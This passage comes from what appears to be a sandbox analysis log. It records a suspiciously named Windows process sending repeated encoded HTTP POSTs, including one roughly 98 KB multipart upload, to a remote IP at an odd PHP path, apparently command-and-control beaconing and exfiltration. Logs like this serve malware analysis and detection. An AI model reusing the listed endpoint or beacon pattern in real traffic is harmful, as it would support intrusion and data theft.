    Data Ascii: YSCY[UW\^\PUPZZ\ZZ[[TVUPTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:)!2$2(]058Z>*0. V>7U*>1$[&T9<7$<X-.Y#,Z!+
Jan 8, 2025 18:08:43.058353901 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:43.194964886 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 08 Jan 2025 17:08:42 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=Z@V0


Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 50011 | Destination IP: 185.177.239.66 | Destination Port: 80 | PID: 8496 | Process: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:08:43.345217943 CET | 599 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
    Host: 185.177.239.66
    Content-Length: 2084
    Expect: 100-continue
    Connection: Keep-Alive
Jan 8, 2025 18:08:43.773447037 CET | 2084 | OUT | Data Raw: 59 59 43 58 5b 5c 57 50 5e 5c 50 55 50 5f 5a 51 5a 5c 5b 5b 54 52 55 5b 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
    Data Ascii: YYCX[\WP^\PUP_ZQZ\[[TRU[TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:=W*%1#'+*>0-(>8=>3.%.?808..Y#,Z!?
Jan 8, 2025 18:08:44.016099930 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:44.150782108 CET | 349 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 08 Jan 2025 17:08:44 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 39 38 0d 0a 0f 12 39 5f 25 38 21 58 23 06 2e 12 2d 2d 02 59 26 2f 0b 59 29 56 34 04 2a 0d 28 00 28 15 2f 01 3f 5d 25 59 24 3c 2a 05 36 3c 35 11 35 00 2c 5f 02 12 25 1a 28 32 02 51 2a 01 2f 5b 3e 27 3e 01 23 0c 2e 5d 2b 20 2e 52 21 39 2c 17 25 0a 26 12 30 1f 24 0e 3c 3d 27 59 2f 07 32 07 36 13 21 50 0c 12 23 09 21 28 37 09 35 38 21 14 3c 01 29 03 25 25 3d 0a 32 00 37 59 21 23 20 0a 24 0d 3f 0b 32 5e 37 0c 25 28 02 01 26 29 30 51 2c 28 20 53 22 01 2d 53 0e 30 55 51 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 989_%8!X#.--Y&/Y)V4*((/?]%Y$<*6<55,_%(2Q*/[>'>#.]+ .R!9,%&0$<='Y/26!P#!(758!<)%%=27Y!# $?2^7%(&)0Q,( S"-S0UQ0


Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 50013 | Destination IP: 185.177.239.66 | Destination Port: 80 | PID: 8496 | Process: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:08:43.494571924 CET | 599 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
    Host: 185.177.239.66
    Content-Length: 2596
    Expect: 100-continue
    Connection: Keep-Alive
Jan 8, 2025 18:08:43.916763067 CET | 2596 | OUT | Data Raw: 5c 5f 46 59 5e 58 52 5d 5e 5c 50 55 50 58 5a 51 5a 53 5b 54 54 57 55 5d 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
    Data Ascii: \_FY^XR]^\PUPXZQZS[TTWU]TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9*"6$!+%&="$. W>7P*=$-9-Y 3<^.-.Y#,Z!#
Jan 8, 2025 18:08:44.180738926 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:44.315757036 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 08 Jan 2025 17:08:44 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=Z@V0


Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 50015 | Destination IP: 185.177.239.66 | Destination Port: 80 | PID: 8496 | Process: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:08:45.231789112 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
    Host: 185.177.239.66
    Content-Length: 2596
    Expect: 100-continue
Jan 8, 2025 18:08:45.589624882 CET | 2596 | OUT | Data Raw: 59 5e 43 5a 5b 54 57 5f 5e 5c 50 55 50 5b 5a 58 5a 58 5b 55 54 54 55 5b 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
    Data Ascii: Y^CZ[TW_^\PUP[ZXZX[UTTU[TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9^*$!'35<Z*%[$$*Y4=*P&-&,/'/0Y.-.Y#,Z!/
Jan 8, 2025 18:08:45.922132015 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:46.039402962 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 08 Jan 2025 17:08:45 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=Z@V0


Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 50016 | Destination IP: 185.177.239.66 | Destination Port: 80 | PID: 8496 | Process: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:08:47.407368898 CET | 599 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
    Host: 185.177.239.66
    Content-Length: 2596
    Expect: 100-continue
    Connection: Keep-Alive
Jan 8, 2025 18:08:47.765068054 CET | 2596 | OUT | Data Raw: 59 59 43 5c 5b 58 52 5f 5e 5c 50 55 50 5a 5a 51 5a 58 5b 5a 54 51 55 51 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
    Data Ascii: YYC\[XR_^\PUPZZQZX[ZTQUQTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:=W232$$(*=X0=4=;Q)R'1,?<^%/9.Y#,Z!+
Jan 8, 2025 18:08:48.081628084 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:48.212094069 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 08 Jan 2025 17:08:47 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=Z@V0


Session ID: 10 | Source IP: 192.168.2.4 | Source Port: 50017 | Destination IP: 185.177.239.66 | Destination Port: 80 | PID: 8496 | Process: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:08:48.466542959 CET | 599 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
    Host: 185.177.239.66
    Content-Length: 2596
    Expect: 100-continue
    Connection: Keep-Alive
Jan 8, 2025 18:08:48.812424898 CET | 2596 | OUT | Data Raw: 5c 58 43 5a 5e 59 52 5b 5e 5c 50 55 50 5f 5a 51 5a 5b 5b 5b 54 5c 55 5b 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
    Data Ascii: \XCZ^YR[^\PUP_ZQZ[[[T\U[TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9]==0!($&(91['-(V)/?U*)0=-8_0?.-.Y#,Z!?
Jan 8, 2025 18:08:49.130783081 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:49.258784056 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 08 Jan 2025 17:08:49 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=Z@V0


Session ID: 11 | Source IP: 192.168.2.4 | Source Port: 50018 | Destination IP: 185.177.239.66 | Destination Port: 80 | PID: 8496 | Process: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:08:49.344053984 CET | 599 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
    Host: 185.177.239.66
    Content-Length: 2084
    Expect: 100-continue
    Connection: Keep-Alive
Jan 8, 2025 18:08:49.702610970 CET | 2084 | OUT | Data Raw: 59 58 43 5a 5e 5f 52 5d 5e 5c 50 55 50 58 5a 5b 5a 59 5b 5a 54 52 55 58 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
    Data Ascii: YXCZ^_R]^\PUPXZ[ZY[ZTRUXTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9=1=X$T#'X>9)\'8>8)!':W,?$Y<..Y#,Z!#
Jan 8, 2025 18:08:50.025100946 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:50.158041000 CET | 349 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 08 Jan 2025 17:08:49 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 39 38 0d 0a 0f 12 3a 06 26 01 36 05 20 28 07 08 2e 2d 24 10 24 06 3a 06 2a 56 2c 01 3e 0a 3c 07 3c 3b 0e 13 3e 28 3d 17 24 02 26 05 21 3c 03 5c 36 3a 2c 5f 02 12 26 45 2b 54 20 56 29 59 38 00 2a 09 25 5a 23 54 29 02 28 20 36 55 23 39 2c 15 25 0d 0c 50 27 31 37 1e 3f 3d 28 05 2e 3d 3e 03 36 03 21 50 0c 12 20 50 35 5e 28 57 22 28 1b 1b 28 38 26 5a 25 25 3e 52 32 29 28 03 23 23 20 0b 25 30 37 0e 31 2b 34 54 24 28 27 10 26 29 3c 53 2d 38 20 53 22 01 2d 53 0e 30 55 51 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 98:&6 (.-$$:*V,><<;>(=$&!<\6:,_&E+T V)Y8*%Z#T)( 6U#9,%P'17?=(.=>6!P P5^(W"((8&Z%%>R2)(## %071+4T$('&)<S-8 S"-S0UQ0


Session ID: 12 | Source IP: 192.168.2.4 | Source Port: 50019 | Destination IP: 185.177.239.66 | Destination Port: 80 | PID: 8496 | Process: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:08:49.471123934 CET | 599 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
    Host: 185.177.239.66
    Content-Length: 2596
    Expect: 100-continue
    Connection: Keep-Alive
Jan 8, 2025 18:08:49.827579021 CET | 2596 | OUT | Data Raw: 5c 59 46 5a 5b 54 57 5b 5e 5c 50 55 50 5c 5a 5b 5a 58 5b 58 54 51 55 5d 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
    Data Ascii: \YFZ[TW[^\PUP\Z[ZX[XTQU]TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9^+!$T+'P#***%.8V=??U>=0*-<Z$<#.=.Y#,Z!3
Jan 8, 2025 18:08:50.163832903 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:50.298451900 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 08 Jan 2025 17:08:50 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 50020 | 185.177.239.66 | 80 | 8496 | C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:08:50.482870102 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
  Host: 185.177.239.66
  Content-Length: 2596
  Expect: 100-continue
Jan 8, 2025 18:08:50.827677965 CET | 2596 | OUT | Data Raw: 59 5b 43 5a 5b 5e 52 5b 5e 5c 50 55 50 50 5a 59 5a 5d 5b 5b 54 55 55 50 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
  Data Ascii: Y[CZ[^R[^\PUPPZYZ][[TUUPTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:*2"0"+')_-[$-;)Y )>"R0R.?(_0<;:.Y#,Z!
Jan 8, 2025 18:08:51.157427073 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:51.287451982 CET | 200 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Wed, 08 Jan 2025 17:08:51 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 50021 | 185.177.239.66 | 80 | 8496 | C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:08:51.016807079 CET | 644 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----gVbqWoHIFdWLMV08sQ1qNt1HbxRCSaJRob
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
  Host: 185.177.239.66
  Content-Length: 98742
  Expect: 100-continue
  Connection: Keep-Alive
Jan 8, 2025 18:08:51.515413046 CET | OUT | multipart/form-data request body chunks (hex dumps omitted)
Jan 8, 2025 18:08:51.706403017 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:52.537020922 CET | 200 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Wed, 08 Jan 2025 17:08:52 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 50022 | 185.177.239.66 | 80 | 8496 | C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:08:52.448947906 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
  Host: 185.177.239.66
  Content-Length: 2596
  Expect: 100-continue
Jan 8, 2025 18:08:52.796385050 CET | 2596 | OUT | Data Raw: 59 58 43 5c 5b 5a 52 5c 5e 5c 50 55 50 5f 5a 5c 5a 53 5b 5e 54 54 55 51 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
  Data Ascii: YXC\[ZR\^\PUP_Z\ZS[^TTUQTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9>!=01$'&;=)[$?)Y<)-:S0=W.,4_0/(9.Y#,Z!?
Jan 8, 2025 18:08:53.164057016 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:53.300460100 CET | 200 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Wed, 08 Jan 2025 17:08:53 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 50023 | 185.177.239.66 | 80 | 8496 | C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:08:53.690413952 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
  Host: 185.177.239.66
  Content-Length: 2596
  Expect: 100-continue
Jan 8, 2025 18:08:54.416863918 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:08:54.803852081 CET | 2596 | OUT | Data Raw: 59 58 43 59 5e 58 52 5c 5e 5c 50 55 50 5b 5a 5f 5a 59 5b 5e 54 50 55 59 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
  Data Ascii: YXCY^XR\^\PUP[Z_ZY[^TPUYTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9X=W"'?%&$X()"$[8=/7U>%3-*S./%<$:=.Y#,Z!/
Jan 8, 2025 18:08:55.588704109 CET | 200 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Wed, 08 Jan 2025 17:08:55 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 50024 | 185.177.239.66 | 80 | 8496 | C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:08:55.185939074 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
  Content-Type: application/octet-stream
